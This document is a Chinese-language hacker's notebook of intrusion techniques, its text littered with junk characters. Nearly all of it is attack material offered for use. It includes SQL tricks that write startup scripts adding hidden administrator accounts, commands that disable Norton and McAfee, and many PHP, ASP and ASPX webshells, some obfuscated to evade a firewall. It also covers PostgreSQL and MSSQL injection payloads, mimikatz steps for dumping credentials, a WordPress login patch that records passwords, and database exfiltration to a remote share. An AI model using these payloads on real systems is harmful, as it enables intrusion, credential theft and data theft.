8 U4 T# u# t A8 ucreate table a (cmd text); G) E6 F1 ?+ t! F" w- ~- s8 j
insert into a values ("set wshshell=createobject (""wscript.shell"") " );' X% S6 w& h& I% M- w: h/ Z% o
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );' J0 d7 \( a% o6 M; B
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( o: `4 L! V; S }# Bselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
, R0 S) b, y/ u( g5 T" D2 \7 mdrop table a;
# w; c# I) T7 @+ {2 o8 \" Z* R
/ |7 {; U# A, }5 A7 U英文版本:) `2 A2 G" e) ?6 d" c l0 h: k
- Q- D1 |/ @: D. O, P4 s3 F4 I
use test;
% w0 D: l2 m0 b- hcreate table a (cmd text);
/ {/ n7 d0 @% `# n( Linsert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 _% I* x8 ^; x7 ~& K$ O% Einsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );. |; U# V7 Q6 N+ t' P
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
+ O! m3 I) c: O F V, kselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";1 U# F) Z% E1 [
drop table a;
+ U# M: i7 T# t% T% t; {1 K! w! M
create table a (cmd BLOB);
4 R& |* t3 j( P& D# pinsert into a values (CONVERT(木马的16进制代码,CHAR));
; W3 o2 ^6 @& Qselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'# \8 U& M6 E1 V
drop table a;
" T# h% X1 T: x% l% V1 p( r9 z1 s' y# o/ g, S' @ C
记录一下怎么处理变态诺顿# O. Z: E! ?, D; I
查看诺顿服务的路径; O9 f$ i0 Z |2 a
sc qc ccSetMgr
9 b5 j; b( n% Z' Q# d( K然后设置权限拒绝访问。做绝一点。。; d7 \8 {) G& ]( _" Q' L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system8 d* Y5 a2 z. @# g8 k1 v5 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
. s: s; |$ {8 B) u% `: jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ L; F. N4 h# r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
) x' F& C0 Z3 Y
5 w$ _9 w+ A' u( `! V% x2 r然后再重启服务器% }' m; d- F4 B. p: F4 e+ y
iisreset /reboot
8 R* m- _+ x% ?4 T; l. b' A这样就搞定了。。不过完事后。记得恢复权限。。。。9 R# d# c7 _" v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! Y2 E, q) c3 ?5 E9 L% S& b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F" m1 V8 N7 x1 z2 h8 y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F) Q$ o! e3 n- F) f [ |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F. n2 |4 P3 m& }
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
0 Y8 A4 |. u$ q' b8 ]
: T* x2 |' x# j$ a V2 LEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
. s5 \! L. H* r% k5 Y% z
* a& k* g+ a! R* q+ hpostgresql注射的一些东西8 g$ P! `- t: T; m5 B7 L
如何获得webshell* I0 g* H# e0 Q& h: O: y
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
, l9 e3 S& n/ dhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
- e* R x0 E& shttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
' F' |: O/ u+ j如何读文件
% ]' q J6 r3 Qhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);; l8 h, W, O4 k& z
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
) p: @0 `* y) e, N9 D/ U+ T" ehttp://127.0.0.1/postgresql.php?id=1;select * from myfile;9 d9 D2 }8 L2 n$ b( C# X. k& K
5 e& g. j" F. I2 L5 S1 P7 Hz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
, \5 t8 B/ s( A# Q当然,这些的postgresql的数据库版本必须大于8.X: D' {- s6 I( l9 L+ S2 Y; v
创建一个system的函数:
2 z9 m' T0 W" RCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT: A' T5 \6 y. ~2 p' m, u( J
9 K) G) v$ ~7 J3 L- T8 P" y创建一个输出表:+ P% } ^; S2 r+ C) J, S3 p6 j
CREATE TABLE stdout(id serial, system_out text)
& G) `( p& i S0 f( x
: l9 C$ r, [( c5 l执行shell,输出到输出表内:" y7 k5 v( @ M3 x- D& h% @
SELECT system('uname -a > /tmp/test')# z9 P' a( R, V
: o" j- |# m5 gcopy 输出的内容到表里面;
& g8 J* V* W6 `1 g1 t; G/ NCOPY stdout(system_out) FROM '/tmp/test': P- m- c+ ]9 f* [7 {5 s
/ m! `- w9 C- ~% Q. M6 |
从输出表内读取执行后的回显,判断是否执行成功
- N( B5 _$ m+ A4 B' ^) k' x- J1 k* [! W B
SELECT system_out FROM stdout$ h1 U0 f8 N" @2 P! u& h
下面是测试例子
: u0 ?! `3 t" O$ |
9 V, a$ a* b+ u: X/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- & I9 o& O, F1 m. U' e3 j9 k8 D6 M
+ {9 B5 i- Y$ P# J1 l1 u$ q
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
5 D* {1 Q9 J. S; iSTRICT --) f: {" v6 C. O6 k5 |2 C0 d
# `8 E: o9 V8 D% u0 P, z/store.php?id=1; SELECT system('uname -a > /tmp/test') --7 x7 g0 f% a. M" K' O4 W
% ?% s9 J) ^; U, D: \6 g/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --' V) q' H% k8 g1 |
9 \$ [4 F. A0 u/ j4 @& ]- P/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--% y2 [" D! A" M+ F" |
net stop sharedaccess stop the default firewall
' S: C h8 g' V1 inetsh firewall show show/config default firewall
7 }/ x" s" ^3 M4 @3 W9 N( K6 m( Wnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall5 ^& `$ q% ?) d# E$ {
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall; n9 [4 |* Q: R( B+ Z
修改3389端口方法(修改后不易被扫出)4 |5 b8 V- ^! \0 M1 B
修改服务器端的端口设置,注册表有2个地方需要修改 `" |1 ]4 w! ^
5 B+ K# w( A9 F- o
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
& r" t' {6 a/ v9 u' B4 l$ o3 f: fPortNumber值,默认是3389,修改成所希望的端口,比如60008 V' ^. g. o" X
: X+ w" W( I4 s9 \( O
第二个地方:
O M) Z4 y" w" ~[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
5 x3 T! e, T, i" ]3 tPortNumber值,默认是3389,修改成所希望的端口,比如60007 z' }" I! h+ K4 J( [5 `7 ?, Z
# g6 L* n+ D" z- n. w6 n' \" q现在这样就可以了。重启系统就可以了( Q4 h7 d/ X/ [" z
3 R( j5 r" [* r; k9 j
查看3389远程登录的脚本
; G/ M9 [" z2 } P7 T& |% H保存为一个bat文件* I; U/ \5 i7 o( f
date /t >>D:\sec\TSlog\ts.log
) k2 E; ]# J- c( y6 K4 B0 V( ytime /t >>D:\sec\TSlog\ts.log
4 I( T$ J2 D3 g1 {- cnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log8 o' T% t# t# d0 t" J
start Explorer0 O8 U& e- V* o6 y% c) |0 r
6 i# ~: f% m, X% l' B, t
mstsc的参数:
2 x- J, M5 j3 ?+ N8 u, [
+ x! \- R5 O* E0 j5 b. v远程桌面连接
6 F; C3 _5 T) A" M. K* ?! `" u# Y% `5 A
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
$ h, t+ ]( z6 ^$ | [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?* _. `" F% |6 N9 G/ e
! a% C# \2 p5 {<Connection File> -- 指定连接的 .rdp 文件的名称。4 i' o. R D, p- X: A8 Y+ ]
& J; t3 N( U2 b4 a' h
/v:<server[:port]> -- 指定要连接到的终端服务器。$ T$ |7 }' {8 z* F1 d0 b7 U$ q) ]
- U) w5 @% |5 R6 C A, X; ?/ B/console -- 连接到服务器的控制台会话。
$ r0 m) N: h6 r2 L9 |3 Z- I0 q) k; j$ C f; _, S2 B/ A3 d; G6 ^
/f -- 以全屏模式启动客户端。
6 A3 k% ?0 o5 @0 `, K; S1 s
, c( E' B# q4 t6 }8 F/w:<width> -- 指定远程桌面屏幕的宽度。$ x" Q% |9 M s3 b+ u7 N
3 J1 Y3 h" t5 R3 I/h:<height> -- 指定远程桌面屏幕的高度。7 g( U3 D, S2 ^; O
" \6 X' N+ _3 i: {0 \8 v$ ]6 ]/edit -- 打开指定的 .rdp 文件来编辑。
4 _, q2 u/ I8 V! T9 c* i
+ K4 I( i; C# P: q% w/migrate -- 将客户端连接管理器创建的旧版, t& E# w4 |& c% T4 o" `3 P' h
连接文件迁移到新的 .rdp 连接文件。
' K4 |5 K0 g. S, S
' W5 X, t2 F( O: H) Y
' Z2 W0 ]' d) }: h其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
- t! _5 h3 x! O+ }* I2 P! Z" D" h5 Nmstsc /console /v:124.42.126.xxx 突破终端访问限制数量- m9 {: B$ H4 Y! z3 R5 t! C) x6 N
8 h. \6 t8 Q" C$ O! a: F命令行下开启3389% c- D4 U( h6 O3 M' g
net user asp.net aspnet /add
( z3 u) y' k% _) J1 {net localgroup Administrators asp.net /add: o) T7 r: Y) X$ K1 z4 ^
net localgroup "Remote Desktop Users" asp.net /add
4 x1 z4 y2 q: L2 Z& qattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
- A7 }. r5 E" h% p8 Cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 00 u* F) K! Z4 X0 t- s1 ^' S
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1: k2 n/ t" F- d- f/ [' U
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
" k; l- P% Q, H' M/ b/ F% o8 [; [sc config rasman start= auto K, b: P9 X2 g. K5 m$ ?
sc config remoteaccess start= auto: z$ R1 U9 c' \ g: s
net start rasman$ p1 D( ~! m7 ~( b! G
net start remoteaccess
& m$ |. @& [. _) oMedia$ q. n3 q2 n" U1 ~+ C6 w3 e1 ]
<form id="frmUpload" enctype="multipart/form-data"9 V8 Y) S( ]9 M! n
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br># e$ k- X, T d1 c
<input type="file" name="NewFile" size="50"><br>/ Q. ]9 C3 W, ]
<input id="btnUpload" type="submit" value="Upload">, g" r6 f8 o: F) F w( c$ ^; K
</form>% z4 C1 F+ a1 j- S" C' W) v* y: m. s: [% G
) i; E. E6 ~9 Wcontrol userpasswords2 查看用户的密码0 [3 K4 ?; E& i5 g0 `1 e( O4 k
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
3 Y( g% D/ n, y# D. {) aSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a$ m4 X+ W2 U3 F2 K: i
$ | D; [- n# a8 a: V( f2 W
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
0 @' E2 M: i3 V. g4 b6 K( q7 f0 f0 H测试1:# W `. T' L5 Z
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 Z% d1 R9 T& ^; a2 |
3 z( S& `7 Y/ _1 i* y测试2:5 F& @$ \: k0 I% o. }! \' ?
6 \- ~. Y7 K, A* Y* n, B, qcreate table dirs(paths varchar(100),paths1 varchar(100), id int)& x, S$ x/ l) g. g
, l: J( [, L3 \; `
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' u4 z* Z/ f' m, h3 S4 h7 y$ o! d% O9 O! _+ k2 j
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t10 u q. o* B/ b2 X9 Y
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
3 q9 F8 s, B- A0 o! G! Z3 b/ ]可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
! z9 ?% u) o: onet stop mcafeeframework/ `4 l/ |" n3 S& P# H/ `4 b e
net stop mcshield
5 I- C$ j/ i7 J+ @. j- anet stop mcafeeengineservice
+ t" Z. g D& c" V7 X+ d& enet stop mctaskmanager
9 i8 h3 B5 B( C$ ?5 P4 X4 T8 khttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
# a2 d& V( c @2 i' j7 @1 H$ s6 h- k" `& u; r) R i: L2 s% L
VNCDump.zip (4.76 KB, 下载次数: 1)
: x& U8 }$ `5 T- }6 G) d密码在线破解http://tools88.com/safe/vnc.php
% d( u# W4 R, ^5 {6 h, yVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
1 C3 v2 ^5 @* p5 {+ c1 x
4 g' T- K* ^1 b: ?; u0 Dexec master..xp_cmdshell 'net user'1 k9 t: H2 y* G9 R. P9 e
mssql执行命令。" E0 z; G- |% c7 O/ _2 V
获取mssql的密码hash查询' ~+ ]+ k: t% H& n# ~9 A
select name,password from master.dbo.sysxlogins/ l. _: s4 D2 c0 s
5 |! B$ t' n. N: K: I! R. P* }
backup log dbName with NO_LOG;
+ e8 s2 q R( G( Ubackup log dbName with TRUNCATE_ONLY;) L# |7 C' t5 M4 ~3 k+ r( \: d- O
DBCC SHRINKDATABASE(dbName);' z, I4 X( q; ^" R; U N
mssql数据库压缩& ]# r* l( D+ l8 p- ]: D$ _
/ y' g5 r7 E9 {1 }( ~1 r! ^7 nRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
+ H- D8 A& T6 T% z1 o! V4 P, f& |将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
* ]* d3 @/ t; G& P2 H# X/ c+ z! ~. x- g# i( s' H! `1 U
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'0 |# G! K, y1 y( `9 [0 L# t. Z
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak2 O) \, W6 l8 ^6 G
% F4 [; _4 F1 d
Discuz!nt35渗透要点:
' d0 X5 _7 b/ p+ n9 Y9 G(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default8 h0 v! P3 U3 c3 U
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
* m& I2 [. ^( f2 z3 M, v& O& m' {+ d7 c; ?(3)保存。# [6 ?. Z Q: [$ Y# v- F5 h
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
, g6 _, P- N7 _5 _d:\rar.exe a -r d:\1.rar d:\website\5 A) ^$ w2 l( H( ?
递归压缩website: `/ a! h0 {; h; W2 y6 c
注意rar.exe的路径
( k i6 C( p! O6 G4 o" }5 a: \7 C2 y- g r
<?php. B0 P$ \" |- k$ l1 y
/ L+ o6 j% j' W7 Y* R" l
$telok = "0${@eval($_POST[xxoo])}";
- h, |6 i) L/ ~" L- ]+ A0 o3 [4 b# j* J/ ?7 k. Q
$username = "123456"; ^& L% T6 _( B9 o
* e; B0 J9 H% U3 j7 ?' G2 _) l$userpwd = "123456";4 C. T2 p* q5 |4 \! S
2 I1 d, V3 y7 h6 P3 q$telhao = "123456";
) F y" }% t& `7 }. w4 T1 o* s1 c
$telinfo = "123456";: U- }' p" O: }( _# X* s" [( G
9 k& P( ~6 U+ W" b& _9 c?>
$ A) b' t5 f/ n* Z% u3 _' Pphp一句话未过滤插入一句话木马0 g: y, h# Q5 o$ S, M" W2 u% Q p' w
- @* g8 S7 t7 @" v2 K站库分离脱裤技巧
2 I2 _+ ?% ^! M+ {1 kexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'3 g) Q7 ~6 v O' ]* O4 f
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
6 r! J# _9 e P( ^# u条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
( Y) B+ H' a6 O( Q" k- {这儿利用的是马儿的专家模式(自己写代码)。
' @) V: q/ n# N. xini_set('display_errors', 1);! U- g7 i" o/ T/ |) v
set_time_limit(0);
8 c( ?' W$ @5 P! r% {. Jerror_reporting(E_ALL);
6 m& V5 }2 |7 v5 l" g$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
2 m! U0 K1 A/ l- hmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
1 |% h9 s* |1 w: a$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());! {! d r! b% u* x! ~
$i = 0;
# W0 T7 y7 s1 n+ [+ y! R7 Q$tmp = '';
' ?; O; X; ?& }! i/ lwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
, @! D5 b& I5 E; G4 y3 C/ f1 m $i = $i+1;
- @+ A4 r: h- {: P& a2 u $tmp .= implode("::", $row)."\n";
5 Y* i3 _3 o7 P) B6 x" G6 K if(!($i%500)){//500条写入一个文件; T# m3 w* f* T2 y" i6 A
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';6 G% i' m2 l; F" G4 t
file_put_contents($filename,$tmp);
' a$ n, l8 q2 B2 s2 l $tmp = '';
+ [0 u, S$ x+ H }
% c2 J/ N7 S3 m4 U7 k1 U}
1 V! w- c9 N' v" i" ^! {* [mysql_free_result($result);" L8 p2 {' o* \, a$ d1 o
2 `& h; g/ L& ]! T: X: _* r. p/ T" y$ ], ?& f
+ L m: B$ Y& b* V) F9 v
//down完后delete9 H2 E4 a8 Y( ~9 ^/ A. N# T' T% n/ g
' Y$ Z7 r0 [7 f8 G4 n1 T% R# Q' X" S) z0 d8 e/ U
ini_set('display_errors', 1);
9 N2 r, B3 q9 ~6 V) V+ Q9 Z) Uerror_reporting(E_ALL);# X/ t$ ]2 N" {4 |. ?/ n# K
$i = 0;% |4 ?6 Z0 e7 ~$ ^: Q, d1 E
while($i<32) {
3 t! r. @6 ~4 j% f- A) V $i = $i+1;2 V7 k( o) J3 ?) k5 B& N
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';6 l8 v! E+ v- e5 H# g
unlink($filename);' x$ o- v( F8 k ]0 `
} % W$ u+ l7 V% x. n2 U- o# d% R( f
httprint 收集操作系统指纹: {5 y8 h4 M* y2 q4 z0 T* ?
扫描192.168.1.100的所有端口) s7 m0 w/ o$ j
nmap –PN –sT –sV –p0-65535 192.168.1.100
7 s2 B6 e) A' [7 _% h7 t2 ohost -t ns www.owasp.org 识别的名称服务器,获取dns信息
: R9 ?" Q0 B, E3 Nhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
, Y: Y# g$ m' t6 ^* ~( Q9 X0 qNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
6 y# M: _' a4 X6 q1 u. J1 Z9 z. e }) E# E
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
: K' P- l& }. z6 |9 m- V- x, ^" N) D4 l
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)1 p& V y6 G5 h7 Z( z, a1 C: L
* g. m9 R- \: y5 }( W$ V0 [* L
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x7 M+ n& {" p6 T
5 Q" i% _" P, g" z DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)5 [3 B" j" m- I5 H' q2 y
a0 ?5 b0 d W5 C( |' F" U http://net-square.com/msnpawn/index.shtml (要求安装)
! `4 H& s" g( E! X
. h6 p' D( `( O2 ~ p' h% W tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)) p' [* J o; k! u
% o' h% M9 e8 ^9 G8 \/ K. N SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
: W, r5 y% _& P6 ?) h( Dset names gb23127 [0 T4 G) J6 e
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
# ~9 a% B; c u. E8 M" G5 d+ f% W
mysql 密码修改
: l7 k& L& F9 f' K! b( ]UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” # ]3 W1 ^5 K3 J- j/ d; I
update user set password=PASSWORD('antian365.com') where user='root';
( \4 u. F( [' j) `) @( T R6 q4 L# oflush privileges;+ }9 Z" L% r9 Y
高级的PHP一句话木马后门* b3 S1 T) j, K8 P1 B
; z# a: C- `/ |8 y% i
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀" s4 C# M% e6 p( |+ [; {
6 o4 b: E% \$ }" g; `4 @
1、4 \" q1 }/ r. Q. C% Q) X
6 z+ ^: m N7 q: H6 C0 F4 s$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! Z5 O% F- b7 a" L- p, h
6 Q9 E: I( s8 h0 S# O
$hh("/[discuz]/e",$_POST['h'],"Access");
- y9 g5 P0 {3 c, y5 N! M( s) ~! `7 ~0 j7 b
//菜刀一句话
5 \: J5 N* g ^
, `& k+ u) K+ m5 [; i2、- q/ F% ]: v- n8 f7 A6 C4 |
# K/ c) w+ a% L% p8 A) V1 w
$filename=$_GET['xbid'];
# F. P' y0 v: B& ^, a& G( c# h* W% p2 L) R, v) A7 h. s9 B
include ($filename);
. U, r* j2 @# ?* w: V: E9 B4 O
9 W \% y5 I2 b//危险的include函数,直接编译任何文件为php格式运行
" i3 w! ~9 V# c: W- e" Q7 [) y
# I Z7 B% U' z3、
' Y1 U" J! c, x! n; G* B
) {/ }( L; i: U# c$reg="c"."o"."p"."y";& L( v8 {# f7 t2 R
1 o$ P# H- d: T; x$ z% p* d$ C$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);) k" w( B5 a6 E2 n% Z
0 c" T6 S9 z( e9 b7 i//重命名任何文件) T; o4 i) x, |5 s0 `& I4 [
" _9 P. U+ A0 L$ Z, b
4、
( J5 A* P$ r. Z# J0 E7 l1 ]; z/ G* k" s3 u0 r# J% @
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
! g1 {1 z2 H5 T
4 x( A9 J; I4 T' z$gzid("/[discuz]/e",$_POST['h'],"Access");3 x) F9 K" E; I# w
" W5 v4 j% F. X2 N4 m/ ?//菜刀一句话
5 F6 ~ J& {5 a( [1 c7 G: n: ?- G4 E; }
, e5 A) N# O' t5 s5 i$ K6 m5、include ($uid);/ L& b' }$ H3 _% Z/ P3 i& \/ K
0 _5 C8 {. u/ `+ L//危险的include函数,直接编译任何文件为php格式运行,POST , @: z4 b4 r- V" K% J/ U9 x
3 ?- T& i/ n0 i, _# D: E
3 G* L/ E) i. b2 N; r1 I+ w//gif插一句话
& E2 l) W/ o# _ S. E% o2 L$ K8 s6 T: Z
6、典型一句话; E# l8 S; N' e' n0 c9 H
F- i( r: K5 [* T
程序后门代码
. _! d0 N9 @, s0 I<?php eval_r($_POST[sb])?>7 B" }. Q% ]9 Z& e) M2 U
程序代码
/ d5 h7 ~5 u$ o; G, V; M5 \<?php @eval_r($_POST[sb])?>
# H+ D0 v# [+ p' a/ u1 ^) _//容错代码
7 a" D* @% c6 f1 J2 s' Y% }程序代码
6 _- ^, b4 c' S3 d/ u<?php assert($_POST[sb]);?>" J. D! j2 _& f
//使用lanker一句话客户端的专家模式执行相关的php语句2 v' q! v4 g# _9 L1 {& @* [+ f
程序代码
) Y# g; c* v/ x' T<?$_POST['sa']($_POST['sb']);?>5 E4 Q k/ B! t m
程序代码
& [0 x5 E Q# h* ]! t+ y<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
" k# B+ r# i; d# i( a6 N程序代码$ }1 Z# ?# z9 m- ~+ C
<?php
* p* S4 _9 ]4 L- l X2 t2 r% o@preg_replace("/[email]/e",$_POST['h'],"error");
1 H& f, K- s- o* K* _/ L?>
3 }3 i2 _5 A* {% S//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
2 [5 E. S9 {$ E2 |程序代码
& r! m3 O* H+ J6 z3 r6 E- [& n8 E<O>h=@eval_r($_POST[c]);</O>
x" r* {& _2 a) d# e9 n* C) U程序代码) C& Y( h- h/ X9 B
<script language="php">@eval_r($_POST[sb])</script> j6 i1 A5 ]8 x6 V; |) }2 P$ H
//绕过<?限制的一句话
" t- m6 m. y& w0 Q
u6 x( [- {, F% bhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
6 J* {1 |# \) H1 V( k7 `8 o: |( x9 M详细用法:
) X4 |; j2 A6 e4 w- x# I1、到tools目录。psexec \\127.0.0.1 cmd
2 G: s: v0 ^& M6 N2、执行mimikatz m" O) R. [" W- V
3、执行 privilege::debug
6 S& ?5 C0 M/ i( x- ~, {4、执行 inject::process lsass.exe sekurlsa.dll
. h0 R) S% w2 d$ P! d4 ^5、执行@getLogonPasswords
5 p! Q$ t5 d5 ^1 X6、widget就是密码
& M: L; s. X& J; j, @7、exit退出,不要直接关闭否则系统会崩溃。
7 d% C5 S4 B1 k. O- U$ K& }2 e
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
4 L G" r3 ~+ d. t- L4 u8 h7 m8 R& e0 w) l; M) z) t
自动查找系统高危补丁! J( S9 a0 I. Y/ l1 C& h C
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
- j- E1 H+ C1 u; Q( \ I8 N+ c% v9 ^; o0 S% x4 o' `
突破安全狗的一句话aspx后门
7 `! `/ I4 J) H% ^1 w- \# Z<%@ Page Language="C#" ValidateRequest="false" %>
8 n4 X, U% i8 d8 u* ]<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
5 z# B7 l# A" a* r) C$ z _webshell下记录WordPress登陆密码* y/ q+ p4 w- l: {4 t, p k* m3 h
webshell下记录Wordpress登陆密码方便进一步社工
5 I. a; o$ C# M# t$ a7 `3 b在文件wp-login.php中539行处添加:
0 K9 h: f9 Y& c/ C// log password
! g- o8 n' U2 H T# }, [2 x* w. C$log_user=$_POST['log'];
8 F& f5 c6 u) n( ~$log_pwd=$_POST['pwd'];
7 } d8 E* u& K; Y* P$ s$ z3 x$log_ip=$_SERVER["REMOTE_ADDR"];
. g4 a- i$ i5 s2 b. M1 r# q, ]3 O$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
6 d7 `& I: m/ m6 ~" `$txt=$txt.”\r\n”;
3 G9 A, T8 v) z2 l0 |if($log_user&&$log_pwd&&$log_ip){. P3 L' v+ t" H; l7 h' u( N
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
/ w S% X3 D+ s- J4 l# i; [}
$ R7 w) U4 B! |% U* {) s当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% K# V" I1 i5 j& i( v8 g1 ]# o2 g+ ^
就是搜索case ‘login’
9 {6 c, U& Q" Q- l; @在它下面直接插入即可,记录的密码生成在pwd.txt中,$ w9 u: h' K" j% T
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
y7 J5 G2 v: Z8 ^利用II6文件解析漏洞绕过安全狗代码:
* A2 `& F1 |; ~. r+ _8 `* R2 Y;antian365.asp;antian365.jpg
. S Q) E- N% ]( x% Q0 |
* b# m9 Z, {: l. A) c7 f- y各种类型数据库抓HASH破解最高权限密码!
